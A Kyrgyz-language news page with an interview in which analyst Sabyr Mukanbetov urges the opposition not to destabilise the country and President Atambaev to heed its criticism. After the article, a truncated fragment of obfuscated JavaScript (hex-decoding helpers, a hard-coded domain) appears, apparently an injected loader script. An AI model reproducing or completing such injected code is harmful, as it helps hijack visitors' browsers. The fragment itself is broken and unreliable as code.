Menu

Сабыр Муканбетов, серепчи: “Атамбаев оппозиция коюп жаткан сын-талаптарга тыкыр көңүл бөлүүсү зарыл, “колуңардан келгенди кылгыла” деп дөөгүрсүгөндө акылдуулуктун жыты жок”

Бөлүшүү:

“Эгер сен отуз жашка чейин социалист болбосоң, анда сенин жүрөгүң жок. Эгер сен 50 жаштан кийин консерватор болбосоң, анда сенин мээң жок”  У.Черчилль
–Сабыке, көрүнбөй кеттиң го? Ызы-чуу болгон жерлерде эле алдыңкы планда жүрчү элең. Жаз менен кошо жер-жерлерде нааразычылык акциялары өтүп, оппозициячыл күчтөр жыйылып, биригип жатса, сен жоксуң? Кайдасың?
–Кыргызстанда эле жүрөм. Айыл жакта. 25 жыл оппозиция тарапта жүрсөм эле азыр дагы ошол жактан издеп жатсаң керек. Мен азыр эл тараптамын. Элибиз бүгүн бийликке да ичи чыкпай, оппозицияны деле колдобой аңкайып турат. Эки жолу ханды тактан кулатышса да “толк” чыкпагандан кийин эмне кылаарын билбей абдырап калды. Мен деле чын жүрөгүмдөн “турмушту өзгөртөбүз” деген ишеним менен 25 жыл өмүрүмдү коомдук ишке арнап, ачка-ток жүрүптүрмүн. Убакыт учкан куш тура… Коңшуларга салыштырмалуу алдыга жылып, демократиялык нормалар орногону менен жалпы жыйынтыкка, экономикалык абалыбызга көңүлүм толбой, пессимисттик маанайга басылып жүрөм. Биз көксөгөн Кыргызстан мындай эмес болчу. “Антип коебуз, минтип койобуз”, “Конституцияны башкача жаза салабыз, анан жыргап калабыз!” дегенибиздин баары чала-жапайы менталитетибизге барып чабылып, таш-талканы чыгып калды го. “Ойлогон ойду кыстаган турмуш жеңет” деп кыргыз бекер айтпаптыр. Өсүш үчүн, өзгөрүш үчүн убакыт керек экен да…
–Жер-жерлерде өткөн митингдерде ар кандай талаптар айтылды, Бектур Асанов “Атамбаев кетсин!” деп талап койду. Азимбек Бекназаров “ар кайсы топтор өз билгенин айтып жатат, жалпы оппозициянын талабы 24-мартта Ош шаарында айтылат” дегенсиген ойду айтууда. Кандай дейсиң, оппозиция опурулуп атып, козголоң чыгып, тополоңго айланып кетпейби?
–Мен жогоруда айткан сөзүм менен оппозицияны сындап, “алар керексиз” дегеним жок. Биригишсин, сындашсын, талаптарын кое беришсин, тек стабилдүүлүктү бузуп, төңкөрүш жасашпаса экен! Кайра Убактылуу өкмөт куруп, кайра мародерлор каптап, кайра мөөнөтсүз шайлоо өткөзүп, жаңы бийликти легитимдештирип, убакыт, каражат коротуп, артка кеткенге акыбыз барбы? Азыр элибиз ушундай ойдо. Бийликке канча нааразы болуп жатса да, стабилдүүлүктүн бузулушун каалабай турат.
Ошол эле учурда, “оппозициянын ана башы болобуз” деп дүргүп жаткандардын көбү калктын калың катмарына жек көрүндү болуп калгандыктан, колдоо таппай жатат. Ошон үчүн мен, баягы анекдоттогу “айга барган” кыргыздай болуп, “жөн эле” турам да. Элдин арасында. Бийлигин деле мактабай, оппозициясын деле боктобой. Экинчиден, балдарым ата болуп, неберелер чоңоюп, биз деле алтымышка таяп калыптырбыз. Негизгиси “радикалдуу кадамдардан майнап чыгат” деген ишеним жок! Андай ишеним болгондо, “бөрү карыса бир койлук…” деп кайрадан топ жарып, эл баштагандан качпас элем!
Ал эми бийлик тууралуу оппозициянын айтып жаткандарын уксаңыз, аларды да колдогуңуз келет. Себеби, эл ичиндеги нааразычылыктар, жан күйгөндөн чыккан сөздөр айтылып, элдин сөзү оппозициянын оозунан чыгып жатпайбы. Оппозиция ойдон чыгарган жери жок, коомдун пикирин чагылдырууга аракет жасап жатат да. “Жарашып, жарашпай жатканы, көтөнү пок” экени башка кеп, көйгөйлөр турмуштан алынганына көңүл буруу керек. Ушул өңүттөн алып караганда, бийликтин позициясы көңүл толоорлук эмес. Оппозиция тараптагыларды душман катары көрүп, медиа айдыңда келекелеп, “силерди эл колдобойт, колуңардан пок келбейт, керек болсо давить этип таштайбыз” деген сыяктуу жүрүм-турумда акылдуулуктун жыты жок. Мурдагы эки президент да ушинтип атып куулуп кеткени сабак болуусу керек да. Азыр ушинтип, “билгениңерди кылгыла” деп дөөгүрсүп жатышып, “оюндан от чыгат” болуп, арты тополоңго айланып кетсе не болот? Же эмне, Кудайдан алган гарантиясы барбы бул бийликтин? Андыктан, Алмазбек Атамбаев оппозиция коюп жаткан сын-талаптарга тыкыр көңүл бөлүүсү зарыл. Оппозиция өкүлдөрүнүн констуктивдүү бөлүгү менен кызматташууга барып, өзүнүн айлана-чөйрөсүн да иргеп, элге жек көрүндү болгондордон арылып, коомдун талаптарын аткарышы керек!
Оппозиция тарап да “ойноп сүйлөсөң да, ойлоп сүйлө” дегенди эстен чыгарбаса. Антпесе, Бектурга окшоп, “Атамбаев кетсин!” дегенди ким колдойт? Болгону бир жарым жыл мөөнөт калган кезде “кетсин” деп, кетирип, анан мөөнөтсүз шайлоо жасап, өткөн эки президенттердин заманындагыдай мыйзамсыз бийлик алмашуулар, туруксуз, коогалаң жашоону кайра кайтаруу кимге керек?
Сурат Жылкычиев
Булак: “АЗИЯnews
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kyrgyztoday.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Эгер бул тексттен ката таап калсаңыз, ошол ката сөздү белгилеп, Ctrl+Enter кнопкаларын чоогу басуу менен билдирип коюңуз.

КОММЕНТАРИЙ КАЛТЫРУУ

Төмөндө көрсөтүлгөн уячаларга керектүү маалыматтарды туура киргизгениңизди текшериңиз.HTML-код киргизүүгө уруксат жок.

Captcha 71 + = 79

ОКШОШ МАКАЛАЛАР

Меню

Орфографиялык ката тууралуу Отчет

Редакцияга төмөнкү текст жөнөтүлөт: